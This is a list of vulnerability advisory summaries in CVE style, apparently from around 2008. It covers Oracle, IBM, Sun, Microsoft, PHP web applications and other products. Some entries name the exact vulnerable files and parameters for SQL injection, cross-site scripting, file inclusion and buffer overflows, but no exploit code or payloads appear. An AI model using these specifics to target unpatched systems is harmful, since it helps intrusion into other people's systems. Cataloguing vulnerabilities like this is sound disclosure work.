Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.17 and 8.49.11 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2615, CVE-2008-2616, CVE-2008-2618, CVE-2008-2620, CVE-2008-2621, and CVE-2008-2622.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.17 and 8.49.11 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2615, CVE-2008-2617, CVE-2008-2618, CVE-2008-2620, CVE-2008-2621, and CVE-2008-2622.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.48.17 and 8.49.11 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2616, CVE-2008-2617, CVE-2008-2618, CVE-2008-2620, CVE-2008-2621, and CVE-2008-2622.
Unspecified vulnerability in the Oracle HTTP Server component in Oracle Application Server 9.0.4.3, 10.1.2.3, and 10.1.3.3 has unknown impact and remote attack vectors.
Unspecified vulnerability in the Database Scheduler component in Oracle Database 10.2.0.4 and 11.1.0.6 has unknown impact and local attack vectors. NOTE: the previous information was obtained from the Oracle July 2008 CPU. Oracle has not commented on reliable researcher claims that this is an untrusted search path issue that allows local users to gain privileges via a malicious (1) libclntsh.so or (2) libnnz10.so library.
Unspecified vulnerability in the Hyperion BI Plus component in Oracle Application Server 8.3.2.4, 8.5.0.3, 9.2.0.3, 9.2.1.0, and 9.3.1.0 has unknown impact and remote attack vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.6 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 12.0.4 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 9.0.4.3, 10.1.2.3, and 10.1.4.2 has unknown impact and remote attack vectors.
Unspecified vulnerability in the Data Pump component in Oracle Database 10.1.0.5 and 10.2.0.3 has unknown impact and remote authenticated attack vectors related to SYS.KUPF$FILE_INT.
Unspecified vulnerability in the Advanced Queuing component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.6 has unknown impact and remote authenticated attack vectors related to SYS.DBMS_AQELM.  NOTE: the previous information was obtained from the Oracle July 2008 CPU.  Oracle has not commented on reliable researcher claims that this issue is a buffer overflow that allows attackers to cause a denial of service (database corruption) and possibly execute arbitrary code via a long argument to an unspecified procedure.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.4 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2586.
Unspecified vulnerability in the Authentication component in Oracle Database 11.1.0.6 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2604.
Unspecified vulnerability in the Authentication component in Oracle Database 11.1.0.6 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2605.
Unspecified vulnerability in the Resource Manager component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.6, and Database Control in Enterprise Manager, has unknown impact and remote authenticated attack vectors. NOTE: the previous information was obtained from the Oracle July 2008 CPU. Oracle has not commented on reliable researcher claims that this is a cross-site scripting (XSS) issue that allows remote attackers to inject arbitrary web script or HTML via the REFRESHCHOICE parameter in multiple web pages.
Unspecified vulnerability in the Data Pump component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.6 has unknown impact and remote authenticated attack vectors related to the IMP_FULL_DATABASE role.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 12.0.4 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5, 10.2.0.3, and 11.1.0.6 has unknown impact and remote authenticated attack vectors related to MDSYS.SDO_TOPO_MAP.
Unspecified vulnerability in the TimesTen Client/Server component in Oracle Times Ten In-Memory Database 7.0.3.0.0 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-2597 and CVE-2008-2598.
Unspecified vulnerability in the TimesTen Client/Server component in Oracle Times Ten In-Memory Database 7.0.3.0.0 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-2597 and CVE-2008-2599.
Unspecified vulnerability in the TimesTen Client/Server component in Oracle Times Ten In-Memory Database 7.0.3.0.0 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-2598 and CVE-2008-2599.
Unspecified vulnerability in the Mobile Application Server component in Oracle E-Business Suite 12.0.3 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the Oracle Internet Directory component in Oracle Application Server 9.0.4.3, 10.1.2.3, and 10.1.4.2 has unknown impact and remote attack vectors.  NOTE: the previous information was obtained from the Oracle July 2008 CPU.  Oracle has not commented on reliable researcher claims that this issue is a denial of service (crash) via a malformed LDAP request that triggers a NULL pointer dereference.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-2593.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 has unknown impact and remote attack vectors, a different vulnerability than CVE-2008-2594.
Unspecified vulnerability in the Advanced Replication component in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.6 has unknown impact and remote authenticated attack vectors related to SYS.DBMS_DEFER_SYS. NOTE: the previous information was obtained from the Oracle July 2008 CPU. Oracle has not commented on reliable researcher claims that this is a SQL injection vulnerability in the DELETE_TRAN procedure.
Unspecified vulnerability in the Oracle Database Vault component in Oracle Database 9.2.0.8DV, 10.2.0.3, and 11.1.0.6 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the Instance Management component in Oracle Database 10.1.0.5 and Enterprise Manager 10.1.0.6 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 9.0.4.3, 10.1.2.2, and 10.1.4.1 has unknown impact and remote attack vectors. NOTE: the previous information was obtained from the Oracle July 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a SQL injection vulnerability in the WWV_RENDER_REPORT package that allows remote attackers to execute arbitrary SQL (PL/SQL) commands via the second argument to the SHOW procedure.
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Advanced Replication component in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 has unknown impact and local attack vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.4 has unknown impact and remote authenticated attack vectors, a different vulnerability than CVE-2008-2606.
Unspecified vulnerability in the Oracle Report Manager component in Oracle E-Business Suite 12.0.4 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the sample Discussion Forum Portlet for the Oracle Portal component in Oracle Application Server, as available from OTN before 20080715, has unknown impact and remote attack vectors.
Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 has unknown impact and remote attack vectors.
Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 has unknown impact and remote attack vectors related to UDDI Explorer.
Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, and 9.0 has unknown impact and remote attack vectors.
Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 and 9.2 MP1 has unknown impact and local attack vectors.
Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 9.2 MP1 has unknown impact and remote authenticated attack vectors.
Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 9.2, 9.1, 9.0, and 8.1 SP6 has unknown impact and local attack vectors.
Multiple unspecified vulnerabilities in LimeSurvey (formerly PHPSurveyor) before 1.71 have unknown impact and attack vectors.
Unspecified vulnerability in the Web Services Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.17 has unknown impact and attack vectors related to an attribute in the SOAP security header.
Unspecified vulnerability in iostat in IBM AIX 5.2, 5.3, and 6.1 allows local users to gain privileges via unknown vectors related to an "environment variable handling error."
Buffer overflow in errpt in IBM AIX 5.2, 5.3, and 6.1 allows local users to gain privileges via unknown attack vectors.
Buffer overflow in the kernel in IBM AIX 5.2, 5.3, and 6.1 allows local users to execute arbitrary code in kernel mode via unknown attack vectors.
Buffer overflow in Uploadlist in eMule X-Ray before 1.4 has unknown impact and remote attack vectors.
Unspecified vulnerability in the web server in eMule X-Ray before 1.4 allows remote attackers to trigger memory corruption via unknown attack vectors.
Directory traversal vulnerability in index.php in Zina 1.0 RC3 allows remote attackers to have an unknown impact via a .. (dot dot) in the p parameter.
Unspecified vulnerability in eMule Plus before 1.2d has unknown impact and attack vectors related to "staticservers.dat processing."
Cross-site scripting (XSS) vulnerability in the URL redirection script (inc/url_redirection.inc.php) in PCPIN Chat before 6.11 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in Isaac McGowan phpInstantGallery 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) gallery parameter to (a) index.php and (b) image.php, and the (2) imgnum parameter to image.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in FicHive 1.0 allows remote attackers to execute arbitrary SQL commands via the letter parameter in a Search action, a different vector than CVE-2008-2416.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the 404 error page for the "Standard demo" in Interchange before 5.6.0 and before 5.5.2 has unknown impact and attack vectors.
SQL injection vulnerability in index.php in Web Slider 0.6 allows remote attackers to execute arbitrary SQL commands via the slide parameter in a slides action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Race condition in the STREAMS Administrative Driver (sad) in Sun Solaris 10 allows local users to cause a denial of service (panic) via unknown vectors.
Unspecified vulnerability in stunnel before 4.23, when running as a service on Windows, allows local users to gain privileges via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in search-results.dot in dotCMS 1.x allows remote attackers to inject arbitrary web script or HTML via the search_query parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the data export function in testMaker before 3.0p10 allows test authors to obtain access to export data via unknown vectors.
Multiple SQL injection vulnerabilities in W1L3D4 Philboard 0.5 allow remote attackers to execute arbitrary SQL commands via the (1) forumid parameter to (a) admin/philboard_admin-forumedit.asp, (b) admin/philboard_admin-forum.asp, and (c) W1L3D4_foruma_yeni_konu_ac.asp; the (2) id parameter to (d) W1L3D4_konuoku.asp and (e) W1L3D4_konuya_mesaj_yaz.asp; and the (3) topic parameter to W1L3D4_konuya_mesaj_yaz.asp, different vectors than CVE-2008-1939, CVE-2007-2641, and CVE-2007-0920.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in CoreGraphics in Apple Mac OS X 10.4.11 and 10.5.4 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unknown vectors involving "processing of arguments."
Multiple integer overflows in Python 2.5.2 and earlier allow context-dependent attackers to have an unknown impact via vectors related to the (1) stringobject, (2) unicodeobject, (3) bufferobject, (4) longobject, (5) tupleobject, (6) stropmodule, (7) gcmodule, and (8) mmapmodule modules.  NOTE: The expandtabs integer overflows in stringobject and unicodeobject in 2.5.2 are covered by CVE-2008-5031.
Unspecified vulnerability in Citrix Presentation Server 4.5 and earlier, Citrix Access Essentials 2.0 and earlier, and Citrix Desktop Server 1.0 allows remote authenticated users to access unauthorized desktops via unknown attack vectors.
Unspecified vulnerability in the Agent user interface in Symantec Altiris Deployment Solution 6.8.x and 6.9.x before 6.9.176 allows local users to gain privileges via unknown attack vectors.
Unspecified vulnerability in a tooltip element in Symantec Altiris Deployment Solution 6.8.x and 6.9.x before 6.9.176 allows local users to gain privileges via unknown attack vectors.
PHP remote file inclusion vulnerability in fusebox5.php in Fusebox 5.5.1 allows remote attackers to execute arbitrary PHP code via a URL in the FUSEBOX_APPLICATION_PATH parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in admin/index.php in Script PHP PicEngine 1.0 allows remote attackers to inject arbitrary web script or HTML via the l parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the TACACS authentication component in Aruba Mobility Controller 3.1.x, 3.2.x, and 3.3.x allows remote authenticated users to gain privileges via unknown vectors.
Cross-site scripting (XSS) vulnerability in index.php in CyrixMED 1.4 allows remote attackers to inject arbitrary web script or HTML via the msg_erreur parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Microsoft Internet Explorer 6 and 7 does not perform proper "argument validation" during print preview, which allows remote attackers to execute arbitrary code via unknown vectors, aka "HTML Component Handling Vulnerability."
Microsoft Internet Explorer 5.01, 6, and 7 does not properly handle objects that have been incorrectly initialized or deleted, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "Uninitialized Memory Corruption Vulnerability."
Microsoft Internet Explorer 5.01, 6, and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, a different vulnerability than CVE-2008-2254, aka "HTML Object Memory Corruption Vulnerability."
Microsoft Internet Explorer 6 and 7 accesses uninitialized memory, which allows remote attackers to cause a denial of service (crash) and execute arbitrary code via unknown vectors, aka "HTML Object Memory Corruption Vulnerability."
The client in Openwsman 1.2.0 and 2.0.0, in unknown configurations, allows remote Openwsman servers to replay SSL sessions via unspecified vectors.
Multiple directory traversal vulnerabilities in PHP-Fusion Forum Rank System 6 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the settings[locale] parameter to (1) forum.php and (2) profile.php in infusions/rank_system/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Java plugin in IBM WebSphere Application Server 5.0.2 allows untrusted applets to gain privileges via unknown attack vectors.
Directory traversal vulnerability in index.php in SMartBlog (aka SMBlog) 1.3 allows remote attackers to include arbitrary local files via directory traversal sequences in the page parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in SMartBlog (aka SMBlog) 1.3 allow remote attackers to execute arbitrary SQL commands via the (1) mois, (2) an, (3) jour, and (4) id parameters to index.php, and the (5) login parameter to gestion/logon.php, different vectors than CVE-2008-2183.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in SystemList.jsp in SysAid 5.1.08 allows remote attackers to inject arbitrary web script or HTML via the searchField parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Robin Rawson-Tetley Animal Shelter Manager (ASM) before 2.2.2 have unknown impact and attack vectors, related to "various areas where security was missing."
Cross-site scripting (XSS) vulnerability in the search module in Sun Java System Web Server 6.1 before SP9 and 7.0 before Update 2 allows remote attackers to inject arbitrary web script or HTML via unknown parameters in index.jsp.
Cross-site scripting (XSS) vulnerability in IBM Lotus Quickr 8.1 before Hotfix 5 for Windows and AIX, and before Hotfix 3 for i5/OS, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to "WYSIWYG editors."
Multiple unspecified vulnerabilities in Solaris print service for Sun Solaris 8, 9, and 10 allow remote attackers to cause a denial of service or execute arbitrary code via unknown vectors.
Unspecified vulnerability in Sun Java System Application Server 7 2004Q2 before Update 6, Web Server 6.1 before SP8, and Web Server 7.0 before Update 1 allows remote attackers to obtain source code of JSP files via unknown vectors.
Unspecified vulnerability in Sun Ray Kiosk Mode 4.0 allows local and remote authenticated Sun Ray administrators to gain root privileges via unknown vectors related to utconfig.
The GENERATE_SEED macro in PHP 4.x before 4.4.8 and 5.x before 5.2.5, when running on 32-bit systems, performs a multiplication using values that can produce a zero seed in rare circumstances, which allows context-dependent attackers to predict subsequent values of the rand and mt_rand functions and possibly bypass protection mechanisms that rely on an unknown initial seed.
Unspecified vulnerability in Plain Black WebGUI 7.4.34 has unknown impact and attack vectors related to "data form list view."
Multiple unspecified vulnerabilities in PhpGedView before 4.1.5 have unknown impact and attack vectors related to "a fundamental design flaw in the interface (API) to connect phpGedView with external programs like content management systems."
Cisco Adaptive Security Appliance (ASA) and Cisco PIX security appliance 8.0.x before 8.0(3)9 allows remote attackers to bypass control-plane ACLs for the device via unknown vectors.
Unspecified vulnerability in Cisco CiscoWorks Common Services 3.0.3 through 3.1.1 allows remote attackers to execute arbitrary code on a client machine via unknown vectors.
The escapeshellcmd API function in PHP before 5.2.6 has unknown impact and context-dependent attack vectors related to "incomplete multibyte chars."
Stack-based buffer overflow in the FastCGI SAPI (fastcgi.c) in PHP before 5.2.6 has unknown impact and attack vectors.
Multiple SQL injection vulnerabilities in admin/adminindex.php in Turnkey Web Tools SunShop Shopping Cart 4.1.0 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) orderby and (2) sort parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in wp-download_monitor/download.php in the Download Monitor 2.0.6 plugin for WordPress allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The FTP service in Acritum Femitter Server 1.03 allows remote attackers to cause a denial of service (crash) by sending multiple crafted RETR commands.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
VicFTPS 5.0 allows remote attackers to cause a denial of service (crash) via a crafted LIST command, which triggers a NULL pointer dereference.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in installControl.php3 in F5 FirePass 4100 SSL VPN 5.4.2-5.5.2 and 6.0-6.2 allows remote attackers to inject arbitrary web script or HTML via the query string.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
BadBlue 2.72 Personal Edition stores multiple programs in the web document root with insufficient access control, which allows remote attackers to (1) cause a denial of service via multiple invocations of uninst.exe, and have an unknown impact via (2) badblue.exe and (3) dyndns.exe.  NOTE: this can be leveraged for arbitrary remote code execution in conjunction with CVE-2007-6378.
Unspecified vulnerability in the ADMIN_SP_C2 procedure in IBM DB2 8 before FP16, 9.1 before FP4a, and 9.5 before FP1 allows remote authenticated users to execute arbitrary code via unknown vectors. NOTE: the ADMIN_SP_C issue is already covered by CVE-2008-0699.
Unrestricted file upload vulnerability in the file_upload function in core/misc.class.php in EncapsGallery 2.0.2 allows remote authenticated administrators to upload and execute arbitrary PHP files by uploading a file with an executable extension, then accessing it via a direct request to the file in the rwx_gallery directory.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
** DISPUTED **
Cross-site scripting (XSS) vulnerability in cgi-bin/contray/search.cgi in ContRay 3.x allows remote attackers to inject arbitrary web script or HTML via the search parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the Sitedesigner before 1.1.5 search template in Magnolia Enterprise Edition allows remote attackers to inject arbitrary web script or HTML via the query parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the profile update feature in Akiva WebBoard 8.0 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors in the form field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple stack-based buffer overflows in Sarg might allow attackers to execute arbitrary code via unknown vectors, probably a crafted Squid log file.
Multiple cross-site scripting (XSS) vulnerabilities in AMFPHP 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) class parameter to (a) methodTable.php, (b) code.php, and (c) details.php in browser/; and the (2) location parameter to browser/code.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in bs_auth.php in Blogator-script 0.95 and 1.01 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the Jom Comment 2.0 build 345 component for Joomla! allows remote attackers to execute arbitrary SQL commands via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in SmarterMail Web Server (SMWebSvr.exe) in SmarterMail 5.0.2999 allows remote attackers to cause a denial of service (service termination) via a long HTTP (1) GET, (2) HEAD, (3) PUT, (4) POST, or (5) TRACE request.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multgiple cross-site scripting (XSS) vulnerabilities in module/main.php in WORK system e-commerce 4.0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) day, (2) month, and (3) year parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the Siebel SimBuilder component in Oracle Siebel Enterprise 7.8.2 and 7.8.5 have unknown impact and remote or local attack vectors, aka (1) SEBL01, (2) SEBL02, (3) SEBL03, (4) SEBL04, (5) SEBL05, and (6) SEBL06.
Unspecified vulnerability in the PeopleSoft HCM ePerformance component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.9 and 9.0 has unknown impact and remote attack vectors, aka PSE03.
Unspecified vulnerability in the PeopleSoft HCM Recruiting component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.8 SP1 has unknown impact and remote attack vectors, aka PSE02.
Unspecified vulnerability in the PeopleSoft PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.22.19, 8.48.16, and 8.49.09 has unknown impact and remote authenticated attack vectors, aka PSE01.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10.2 and 12.0.4 have unknown impact and attack vectors related to (a) Advanced Pricing component, aka (1) APP02, (2) APP03, and (3) APP09; (b) Application Object Library component, aka (4) APP04, (5) APP07, and (6) APP11; (c) Applications Manager component, aka (7) APP06; (d) and Applications Technology Stack component, aka (8) APP08.
Multiple unspecified vulnerabilities in Oracle E-Business Suite 11.5.10.2 have unknown impact and attack vectors related to (a) Advanced Pricing, aka (1) APP01 and (2) APP10; and (b) Applications Framework, aka (3) APP05.
Unspecified vulnerability in the Oracle Portal component in Oracle Application Server 9.0.4.3 has unknown impact and remote attack vectors, aka AS03.
Unspecified vulnerability in the Oracle Dynamic Monitoring Service component in Oracle Application Server 9.0.4.3, 10.1.2.2, and 10.1.3.3 has unknown impact and remote attack vectors, aka AS02.
Unspecified vulnerability in the Oracle Jinitiator component in Oracle Application Server 1.3.1.14 has unknown impact and remote attack vectors, aka AS01.
Unspecified vulnerability in the Oracle Application Express component in Oracle Application Express 3.0.1 has unknown impact and remote attack vectors, aka APEX02.
Unspecified vulnerability in the Advanced Queuing component in Oracle Database 9.0.1.5 FIPS+, and 10.1.0.5 has unknown impact and remote attack vectors related to SYS.DBMS_AQJMS_INTERNAL, aka DB15.  NOTE: the previous information was obtained from the April 2008 CPU.  Oracle has not commented on reliable researcher claims that DB15 is for multiple buffer overflows in the (1) AQ$_REGISTER and (2) AQ$_UNREGISTER procedures.
Unspecified vulnerability in the Data Pump component in Oracle Database 9.2.0.8, 10.1.0.5, 10.2.0.3, and 11.1.0.6 has unknown impact and remote attack vectors related to KUPF$FILE_INT, aka DB11.  NOTE: the previous information was obtained from the April 2008 CPU.  Oracle has not commented on reliable researcher claims that DB11 is for a buffer overflow in the SYS.KUPF$FILE_INT.GET_FULL_FILENAME procedure.
Unspecified vulnerability in the Oracle Net Services component in Oracle Database 9.2.0.8, 10.1.0.5, and 10.2.0.3 has unknown impact and local attack vectors, aka DB09.
Unspecified vulnerability in the Authentication component in Oracle Database 11.1.0.6 has unknown impact and remote attack vectors, aka DB08.
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.3, and 11.1.0.6 have unknown impact and remote attack vectors related to (1) SDO_IDX in the Spatial component, aka DB07; and (2) Core RDBMS, aka DB10.  NOTE: the previous information was obtained from the Oracle CPU.  Oracle has not commented on reliable researcher claims that DB07 is SQL injection.
Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 and 10.2.0.3 have unknown impact and remote authenticated attack vectors related to (1) SDO_UTIL in the Oracle Spatial component, aka DB05; or (2) fine grained auditing in the Audit component, aka DB14.  NOTE: the previous information was obtained from the Oracle CPU.  Oracle has not commented on reliable researcher claims that DB05 is SQL injection.
Unspecified vulnerability in the Change Data Capture component in Oracle Database 10.1.0.5, 10.2.0.3, and 11.1.0.6 has unknown impact and remote authenticated attack vectors related to DBMS_CDC_UTILITY, aka DB02.  NOTE: the previous information was obtained from the April 2008 CPU.  Oracle has not commented on reliable researcher claims that DB02 is for SQL injection in LOCK_CHANGE_SET.
Unspecified vulnerability in the Oracle Secure Enterprise Search or Ultrasearch component in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3; Application Server 9.0.4.3 and 10.1.2.2; and Oracle Collaboration Suite 10.1.2; has unknown impact and remote attack vectors, aka DB04.
Multiple unspecified vulnerabilities in Oracle Database 9.0.1.5 FIPS+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 have unknown impact and remote unauthenticated or authenticated attack vectors related to (1) SYS.DBMS_AQ in the Advanced Queuing component, aka DB01; (2) Core RDBMS, aka DB03; (3) SDO_GEOM in Oracle Spatial, aka DB06; (4) Export, aka DB12; and (5) DBMS_STATS in Query Optimizer, aka DB13.  NOTE: the previous information was obtained from the Oracle CPU.  Oracle has not commented on reliable researcher claims that DB06 is SQL injection, and DB13 occurs when the OUTLN account is reset to use a hard-coded password.
Unspecified vulnerability in the Oracle Enterprise Manager component in Oracle Database 9.0.1.5 FIPS+; Application Server 1.0.2.2; and Enterprise Manager for AS 1.0.2.2 and Database 9.0.1.5 has unknown impact and local attack vectors, aka EM01.
Integer signedness error in the xrealloc function (rdesktop.c) in RDesktop 1.5.0 allows remote attackers to execute arbitrary code via unknown parameters that trigger a heap-based overflow.  NOTE: the role of the channel_process function was not specified by the original researcher.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in DivXDB 2002 0.94b allow remote attackers to inject arbitrary web script or HTML via the (1) choice, (2) _page_, (3) zone_admin, (4) general_search, and (5) import parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in view.cgi in Smart Classified ADS Professional, Smart Photo ADS, and Smart Photo ADS Gold allow remote attackers to inject arbitrary web script or HTML via the (1) AdNum and (2) Department parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Poplar Gedcom Viewer 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) text and (2) ul parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the labeled networking functionality in Solaris 10 Trusted Extensions allows applications in separate labeling zones to bypass labeling restrictions via unknown vectors.
Sun Solaris 8, 9, and 10 allows "remote privileged" users to cause a denial of service (panic) via unknown vectors related to self encapsulated IP packets.
Unspecified vulnerability in the floating point context switch implementation in Sun Solaris 9 and 10 on x86 platforms might allow local users to cause a denial of service (application exit), corrupt data, or trigger incorrect calculations via unknown vectors.
Cross-site scripting (XSS) vulnerability in mindex.do in ManageEngine Firewall Analyzer 4.0.3 allows remote attackers to inject arbitrary web script or HTML via the displayName parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in phpBB before 3.0.1 have unknown impact and attack vectors, related to "two minor security-related bugs."
Unspecified vulnerability in Opera before 9.27 has unknown impact and attack vectors related to "keyboard handling of password inputs."
Buffer overflow in rsync 2.6.9 to 3.0.1, with extended attribute (xattr) support enabled, might allow remote attackers to execute arbitrary code via unknown vectors.
Cross-site scripting (XSS) vulnerability in gallery.php in Simple Gallery 2.2 allows remote attackers to inject arbitrary web script or HTML via the album parameter to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in IBM DB2 Content Manager before 8.3 FP8 has unknown impact and attack vectors related to the AllowedTrustedLogin privilege.
Unspecified vulnerability in HP Oracle for OpenView (OfO) 8.1.7, 9.1.01, 9.2, 9.2.0, 10g, and 10gR2 has unknown impact and attack vectors, possibly related to the July 2008 Oracle Critical Patch Update.
Unspecified vulnerability in libc on HP HP-UX B.11.23 and B.11.31 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP LDAP-UX vB.04.10 through vB.04.15 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, makes it easier for remote attackers to conduct DNS rebinding attacks via unknown vectors.
Directory traversal vulnerability in index.php in Sava's Link Manager 2.0 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the q parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in viewlinks.php in Sava's Link Manager 2.0 allows remote attackers to execute arbitrary SQL commands via the category parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in index.php in Sava's GuestBook 2.0 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
